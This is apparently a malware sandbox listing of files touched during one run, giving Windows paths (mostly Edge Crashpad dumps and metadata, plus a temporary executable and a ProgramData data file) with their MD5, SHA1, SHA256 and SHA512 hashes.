C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\458144a3-65d7-43c5-9040-839c17b80fa6.dmp

MD5 23603b80956b0426f1057f44914f7d0c
SHA1 4ea56a8c10cc2210e5cff4c36c41be3a87050f7f
SHA256 45f787a30b253c26a7ed775ffe27dc30a9da45306e25cfa9ab654f0407b5b40f
SHA512 63dc9a4d64bd046e8132c6ae7687dfc6bfcdf08deacf6d3a2fed6fdabf5946e05d66d5c775b4f126da9ea3acfd47cc970827e2d86ae55a6edc91b6babe999222

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5bee9048dd455f7a6d1ab5073e1f0e24
SHA1 dae4261a9ce448cce56af261c92874a8ca7e3b79
SHA256 58dba6f3e08b12170e26c97c2eaa1df31098d0a93a74eec4f388fce511611724
SHA512 23afe4206d16efc72fcdadc81a1986ce34ae6c5a991cb4f40b94e26d13a21d8a7ca8f2aa5da70f6d7766afd557872e9a91b794aee96da3ca8302dc4844eb89a9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 9b4385b400d1ff5d588dd4aa3f1eae3a
SHA1 da8d0de19cf1d061610e7872ad1235583ab62bb7
SHA256 c5cfbed79f0c9d582af953a5714485c602eb853503e109504d637d20592093c5
SHA512 898461d04ff67a772ebb4c208e20ac727381198bc665cbc038a9c3495cab2578f29709ed39ad017c99b5c8588f86be1057deafa1c6355cb9489adeefc663ec9e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\fe6a1be6-75d3-487f-934d-52b09b4695ee.dmp

MD5 4ec108862437c37703ed4a683cead1e7
SHA1 5722979937d00d704bc21ac78f3764c06758012b
SHA256 c85b4c5d173269fef4db233496a9efef2154a66b929ef1c96f3b4543c590ddcb
SHA512 c186bc31329e8105e5cfcd4ee75e35a067c8c07a7c31fdfe8e9f55531d310c5a099090b77fafa37bd38b5c2fcc8026ee01bd38217316997d944cacb9e37c5189

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 fb8bdacad805a50535dfe81e4f0da26b
SHA1 451b7fae91c967a094b2e553ece5a224040d7bbf
SHA256 3d327a85f54b4dc962054bdc9afbd756fe959187785f8c6882826aab3eb115c4
SHA512 78e93f866cef3b410200a16f76fe72ddf1d080b06d706bd3cc85b497898da69640cbdc5293496fd992f2c16bbd9bdb07ebb940f274c4fcfdf95b273a08880ecc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\cd3c6d0f-6d70-4eed-961f-05b5abd25369.dmp

MD5 a6e383bcb183b7f99cc368c63738bc05
SHA1 1a670836629838d05d19a94cfb9c1265d5f846cc
SHA256 9683f6152849dda6a1fb18e9ec8784529225e11e08108c31da9abea899b3de43
SHA512 ce026907bfbe658796d2c64cdf443f9f90e4d75db97c10f46554a0ac85d37cff17ae9ace1657aa409729dd4ddc19cfab05e73b103e89eb3efc54207f0d69bf5f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f2f84e27-43f4-42c6-889f-d974510ff128.dmp

MD5 66485a15ccfdfbf55658d44681491d63
SHA1 6eae5b4fc5ed57dff0558b194c2fda5c8d0f677f
SHA256 414ebebe512acf22276c3b84f8013d19aae1cb7a57f44736fe83ae0849de5181
SHA512 d6666a3df6252c6f791e473fe318e3ee787ed6280078b08cbfc8e549dac1128650c3551e61111b4a8e15c6ca0365eb5fd5dd4ceebcc5032b009ba96dad0108ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 371d740516a23561106f17ced7740eae
SHA1 232b609503393f9dd8c2999d900b72c45bce1f7a
SHA256 41a17e797f1a40bfe279fab8e2e1dc71134bba2deba5aa6d1b0d071b95c5c6d5
SHA512 b0275e6dabff2a2ad4fd27ca1737a642b73a7eabd629517072e9dbb618151a2b6899910ceb66bfaa595e42063c24e92ffd4fe8d0dbdc935669cd31e77e023026

C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe

MD5 ecbd88e7bb854e4ce89e94f5e76d0116
SHA1 2a2415f6db7d9bf6ec445cadd57d0ef7cd8e66fd
SHA256 c2dbaaa27274e1b7eab4c2d13dff48715ae8afc54201b2d469f6fca8364f5684
SHA512 cf477fdd53d86ffa90d5529f80fb4f70dac75b5c486ffca7a2be614a6be93de21a293ad24a7ccb3cf8729dcebd64105c25b4cf2db1a0704a7ef36bb1a52a3020

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 38dac394e031f989c9320a97287745e0
SHA1 0ccdfdfa01e16e0ada58df44e0b450d4fe83a207
SHA256 1268e02e01f571ee8efc39c7f9f2c57f47992a5be7c49c2b072c016c358f1b4d
SHA512 f164df80d70088bbd9b8e457aa4c3f66117be8727cd8999bebcca353cc9e82c0cb9837c2d16b9aab36a88ed285b55eff7dafc48dddd162a712f94407400fd73a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 30f827359197630f01d2351d601b8a01
SHA1 bb332c647217df8d1d8199db2d64ee7c1174741f
SHA256 0fb4821ee25fd22e87f7fada40f116d28398bdca18ff7a275952dbcd3218c0ea
SHA512 c14883e76cfaf8c96a0caae4468e8bfb744bf4e95e9f57bf3c0c108669f3bb380ab167dd8aebc354a2865075571cb8deef26084dcdfa951e789cd66c3e802283

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\efaa20f8-2f16-4f25-949e-5762b72e8698.dmp

MD5 4980b14898af6cf19fa0b43cba791cfc
SHA1 af7b91f376e4777fd4f27ccddde491385fd924df
SHA256 0a99f6284c5648b1e04e557f95b47fa306603e9b093b7e3c3d0753b90ac8d101
SHA512 e478cb2fc1d8944900a832ddca98785f465eb54f00f03617fccbc51f102af3ea162c618bd9825e4f2f3e50bf836736d00627b0d466c2b1e7c95da978e2d36a5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 f431c40c828c23640fad8496fe98cd2c
SHA1 f30e6b16f1f22cc0fb383c7695ecc440c94ffc0f
SHA256 79aad6a1e85915891343d3080271127fa5bd3aa51cfaefc77a341c0ab4d44c11
SHA512 ed71831cba1fd80ac473fa9f76c1d704ebbd2786b0465babc6af53ee7d143ea49daa11aec735f61162c32ff183cfe8d9aca369a6017424dad1de6b2506b94e13

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1c525a5b-02f7-417f-8787-146c8fcfec3d.dmp

MD5 2bda9027e141581a64da67ac19cd53a1
SHA1 632d642410058f88a30cdb877391d4da491838c5
SHA256 b95c9b18b49ca9345e4a0770966e246a4571cb630f6c0226ec7b74c6b78cf6cf
SHA512 f15b58fe9cd9834fed5e1989347ab96ca85a44053d53305a18dfcedd5d2d6e32428f3b6da237b911d9fd411b37e9887348b151220312f76f959c05ac99c10c0b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c66403ecef322d813334d5a255c0fa50
SHA1 603b61046ddebdb729c024758c0a984d1dd180e6
SHA256 e6778cb65a40f1feddae01aa9679a62e66f99ab2e1b18bb77536e9dc4191cc32
SHA512 66c9f859e8589a779a8dfee9ae4d5aa71408b74ebe0d0a5bbd1dea8b29d70c8121cdbd693f43a6deafbc070ffd366eb9074f4bb9bdbeb32b301d7ac848d522d3

memory/6752-2631-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 d53d307381c70d8ea98d800cad5c2967
SHA1 b817f8ddbbbcc1168c3b8f5de8364e2598342dc0
SHA256 0b759e1151fe427f00cb8588bc35cc2d554fea4678c4e6d9325d54ea0ad1dd7b
SHA512 0ed46ce98c80fb18e82b0df14005f41feaa3ab428c9cafb25f5dd25ff396de0c5a0c46b23ed6d05473a0d963ecd436e9d1931167af55f5ab3d7de0b1809f2eeb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\379ff1c7-8942-4a32-a3bc-136f24a65636.dmp

MD5 fad2d99ea3a5381aa23b1dfa6481a630
SHA1 395bca2c3fd950c07b41b1fa7cc8ce2cef31ed9b
SHA256 5369497a7c7acd07c520e43cda754680909e6eacf7d1b4f645c72176e10763a3
SHA512 17becd9a5c29a691dd55f07fb1a428ca8a335ee33f7daf2815946aeccbc4233eff909fe68cfedbb9bf8b67e989fdcfac8729265b6aca7350dc6d816510e5df4f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 f502d47616599fab93d42d0382c42134
SHA1 a935263f2993402c50c584bb4a0dfa75b11ca531
SHA256 6603ba583a29296703fc675bf7bbe80f0e6b7d2741446f8743693af0eecbf6dd
SHA512 552729a0f17a5c4e284b8f9378c3c90cd57f72492fc9f27dfdfb57bc7df9918538d1277ee565bba43e83fff77d76ba4e141de7a09aa3676579f1bddf9d9d6f88

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1bd2d112-77b5-49f2-a560-aaaf5a5de09c.dmp

MD5 db34a4da8940a578f2a6ce74b3abf080
SHA1 7543835eb053ae9f4ed012bd6a25dce610029f32
SHA256 b562645b47c58ed2e39e981bdb2465abd68ac5a8a9606a1bfac491f785b32897
SHA512 2d9301ff2d3e54c211fc91a0c8fa070da2abacfa1e97185274805d4d518fc5983a09b644f2b50c0028199c457537d91422584de785082988d8349d4d4a1734d7

C:\ProgramData\18C3A83B123DB06D.dat

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
